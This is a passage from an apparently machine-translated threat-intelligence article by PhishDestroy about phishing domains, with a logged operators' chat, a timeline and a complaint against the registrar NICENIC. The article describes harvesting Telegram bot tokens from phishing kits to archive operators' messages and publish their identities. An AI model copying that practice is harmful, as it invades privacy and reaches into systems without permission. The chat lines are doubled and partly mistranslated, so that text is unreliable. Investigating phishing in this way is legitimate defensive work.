Socio del BRICS desde octubre de 2024 (¿La cumbre de Kazán?) ¿Es también patriótico robar a los ciudadanos de tus aliados? Los estafadores de la CEI son ladrones que no hacen distinciones, carecen por completo de inteligencia y no tienen ni pizca de lealtad. Lee nuestras otras investigaciones en las que hemos documentado
casos de enjuiciamiento En el caso de operadores similares, el resultado es siempre el mismo.
ME
MONETTI ESCOBAR25-03-2026 13:12:49
Sí, ya veo.Sí, lo veo
ME
MONETTI ESCOBAR25-03-2026 13:12:55
Que te jodan.¿Qué tontería estás diciendo?
B
Tómate las cosas con calma25-03-2026 13:13:09
Bueno, tampoco es que sea muy emocionante que te dejen sin energía.Bueno, estar juntos tampoco es para tanto
ME
MONETTI ESCOBAR25-03-2026 13:13:13
No va a hacer nadaNo hará nada
ME
MONETTI ESCOBAR25-03-2026 13:13:18
¿Qué va a hacer?¿Qué va a vender?
D
Devoys25-03-2026 13:13:26
qué es¿Qué es esto?
ME
MONETTI ESCOBAR25-03-2026 13:13:34
Sí, se ha apuntado un chicoVaya, se ha unido alguien
D
Devoys25-03-2026 13:13:34
¿de dónde?¿de dónde?
B
Tómate las cosas con calma25-03-2026 13:13:35
Aunque hayas iniciado sesión en la página de phishing un par de veces desde tu propia IP, ya no está bien.Aunque solo haya entrado un par de veces en Fish desde mi IP, ya no tiene gracia
ME
MONETTI ESCOBAR25-03-2026 13:13:37
Al grupoAl grupo
ME
MONETTI ESCOBAR25-03-2026 13:13:38
XzХз
D
Devoys25-03-2026 13:13:39
cuando se utiliza la interpolacióncuando en Interpol
D
Devoys25-03-2026 13:13:41
a la que¿a cuál?
ME
MONETTI ESCOBAR25-03-2026 13:13:44
EsteEsta
B
Tómate las cosas con calma25-03-2026 13:13:46
Solo he venido aquí a charlarEntra aquí en el chat
B
Tómate las cosas con calma25-03-2026 13:13:49
Escribió queEscribió que
ME
MONETTI ESCOBAR25-03-2026 13:13:56
.
B
Tómate las cosas con calma25-03-2026 13:13:57
Hola, solo tienes que guardar tus datos y esperar un momento.
ME
MONETTI ESCOBAR25-03-2026 13:14:11
[Foto compartida]
D
Devoys25-03-2026 13:14:31
Ya los he visto antes.Ya he visto cosas así
B
Tómate las cosas con calma25-03-2026 13:14:44
Bueno, a nosotros también nos han pillado con el bot de Ukr.Bueno, pues nos han dado una paliza por el bot ucraniano
B
Tómate las cosas con calma25-03-2026 13:14:55
No escribiste nada en el chat.Hace tiempo que no escribimos en el chat
B
Tómate las cosas con calma25-03-2026 13:14:57
¿No escribiste tú¿O es que no lo escribieron?
ME
MONETTI ESCOBAR25-03-2026 13:15:04
Me da igual.Sí, y que le den
B
Tómate las cosas con calma25-03-2026 13:15:06
En nombre del canalEn nombre del canal
D
Devoys25-03-2026 13:15:23
Olvídalo de una vez.que te den
ME
MONETTI ESCOBAR25-03-2026 13:15:31
Voy a acabar con este grupoVoy a eliminar este grupo
B
Tómate las cosas con calma25-03-2026 13:15:35
+
D
Devoys25-03-2026 13:15:35
Síда
— Grupo eliminado por el propietario —
El grupo se eliminó en cuestión de minutos. El mensaje de despedida de Bonya —«+»— y la respuesta de Devoys —«sí»— lo dicen todo: Sabían que estaban al descubierto, y su única opción era destruir las pruebas. Pero para entonces, los datos ya se habían recopilado.
Fíjate en el revelador comentario de Bonya: «También nos atacaron a través del bot ucraniano» — lo que confirma que ambos proyectos (el ucraniano y el indonesio) cuentan con el mismo equipo de operadores, y que no era la primera vez que su infraestructura se veía comprometida.
Sección 8: Qué pone esto de manifiesto
Cómo funciona PhishDestroy
Todos los dominios que aparecen en phishdestroy.io pasa por este proceso automatizado. dopomogvoina[.]sbs no fue una excepción.
Detección
Análisis estático
Cartografía de infraestructuras
Descubrimiento del origen
OSINT
Generación de informes
Cronología de la investigación
20 de marzo de 2026
Dominio dopomogvoina[.]sbs registrado a través de NICENIC International
21 de marzo de 2026
Detectado por el sistema de supervisión automatizado de PhishDestroy
21 de marzo de 2026
Análisis totalmente automatizado completado: infraestructura mapeada, paquete JS desofuscado, protocolo WebSocket documentado
22 de marzo de 2026
Se ha identificado la dirección IP de origen. Se ha descubierto un segundo proyecto de phishing («HealthCare ID») en el mismo servidor
22 de marzo de 2026
Al descubierto config.json permite identificar al operador a través de la API de Telegram Bot
23 de marzo de 2026
Denuncias por abuso presentadas ante el proveedor de alojamiento, Cloudflare, y los CERT pertinentes
25 de marzo de 2026
Artículo publicado. Informes sobre dominios disponibles en PhishDestroy
Cómo fue posible: la red de inteligencia de bots de PhishDestroy
Esta investigación fue llevada a cabo íntegramente por sistemas automatizados. El proceso de PhishDestroy no solo detecta dominios de phishing, sino que se infiltra en la infraestructura de los operadores que hay detrás de ellos.
Más de 2000
Bots de Telegram recopilados
Activo
Algunos bots siguen siendo objeto de seguimiento
Desde 2024
Recaudación en curso
Cuando los kits de phishing revelan los tokens de los bots de Telegram —como ocurrió con este a través de config.json — nuestro sistema los recopila automáticamente, asigna los grupos de operadores, extrae las listas de miembros y archiva los historiales de mensajes. Más de 2000 bots se han recopilado de esta forma desde 2024. Algunas siguen activas, y nos gusta ver cómo actúan los delincuentes en tiempo real, porque el final ya está escrito.
Incluso los operadores que borran sus cuentas o eliminan sus grupos ya es demasiado tarde. Para cuando se dan cuenta, ya lo tenemos todo: archivos de mensajes, datos de perfil, pertenencia a grupos y bots conectados. Borrarlo no cambia nada. Los datos ya existían, y ahora están en nuestra base de datos.
«Espérame» — Edición estafadores
Este caso no es único: es un ejemplo de negligencia sistemática por parte de NiceNIC que decidimos presentar como ejemplo de «megahackers». Como señaló acertadamente «Типичный Мошенник»: hay una diferencia entre los hackers y los estafadores — inteligencia. Estos operadores no son ni hackers ni personas inteligentes.
Los sistemas de PhishDestroy recopilan automáticamente pruebas como esta en miles de dominios: detectan bots, archivan las comunicaciones de los operadores y trazan mapas de la infraestructura. Este caso concreto era sencillamente demasiado absurdo como para no publicarlo. El kit de phishing es de baja calidad, la seguridad operativa brilla por su ausencia y los operadores borraron precipitadamente su grupo a los pocos minutos de ser descubiertos.
Estamos desarrollando un sistema que mostrará identidades de los operadores verificadas directamente en las páginas de informes de dominios — de estafador a víctima, como en el programa de televisión ruso «Жди Меня» (Espérame), pero al revés. Lleva funcionando en modo privado desde 2024. Ya se ha identificado a muchos operadores, incluidos aquellos que borraron sus cuentas. Ahora mismo estamos decidiendo cuál es el más interesante una forma de presentarlo. No te lo pierdas.
Dominios relacionados
Nuestro análisis identificó un segundo ámbito — hlpforvpeople[.]sbs — registrados a través del mismo proveedor de registro y con patrones de infraestructura coincidentes. Ambos dominios figuran en nuestra base de datos:
Incumplimiento por parte del registrador: NICENIC International
NICENIC International Group Co., Limited (Hong Kong) ha recibido varios informes detallados sobre abusos de PhishDestroy sobre ambos dopomogvoina[.]sbs y hlpforvpeople[.]sbs. En el momento de la publicación — 5 días después del primer informe — No se ha tomado ninguna medida. Ambos dominios siguen funcionando con total normalidad.
Este no es un caso aislado. NICENIC es un problema recurrente en nuestras investigaciones. El contacto para denunciar abusos del registrador (abuse@nicenic.net) se niega sistemáticamente a responder a las denuncias de phishing, respaldadas por pruebas. A pesar de ser un registrador acreditado por la ICANN y sujeto al Acuerdo de Acreditación de Registradores (RAA, artículo 3.18), NICENIC opera con aparente impunidad.
NICENIC mantiene su presencia en ruso y comercializa .ru dominios a precios elevados (alrededor de 200 dólares), y se comunica con los clientes a través de VK y Telegram, plataformas muy populares entre el público de habla rusa. El hecho de que su clientela coincida con la de comunidades clandestinas plantea serias dudas sobre si la falta de respuesta del registrador ante las denuncias de abusos se debe a negligencia o a una estrategia comercial deliberada.
Esta investigación se publicó parcialmente debido a la prolongada inacción de NICENIC. Cuando los registradores se niegan a tomar medidas ante los abusos relacionados con el phishing, la denuncia pública se convierte en el único mecanismo de rendición de cuentas que queda.
Puntos clave
- La automatización es la única forma de no quedarse atrás. Los kits de phishing se implementan y se utilizan con fines maliciosos en cuestión de horas. La revisión manual no puede adaptarse a ese ritmo.
- Los operadores cometen errores. Un archivo de configuración expuesto en un proyecto secundario desmanteló toda una operación multinacional de phishing. Es difícil mantener una seguridad operativa (OPSEC) perfecta en todos los proyectos.
- La ingeniería social evoluciona al ritmo de la actualidad. La guerra, la ayuda humanitaria y los programas gubernamentales se utilizan cada vez más como señuelos para el phishing, ya que se dirigen a personas en situación de necesidad que son menos propensas a cuestionar su legitimidad.
- La reutilización de infraestructuras es la norma. Un servidor, dos proyectos de phishing, dos países, los mismos operadores. El análisis de las conexiones de la infraestructura revela mucho más que el análisis aislado de un solo dominio.
Investigaciones relacionadas
Más investigaciones procedentes del canal de inteligencia automatizado de PhishDestroy
Aviso legal: Esta investigación se llevó a cabo íntegramente mediante reconocimiento pasivo y API públicas. No se realizó ningún acceso no autorizado a ningún sistema. Las llamadas a la API del bot de Telegram utilizaron un token que los operadores habían expuesto públicamente en un punto de acceso sin autenticación. Todos los nombres de dominio que aparecen en este artículo se han ocultado siguiendo la convención estándar de seguridad de la información.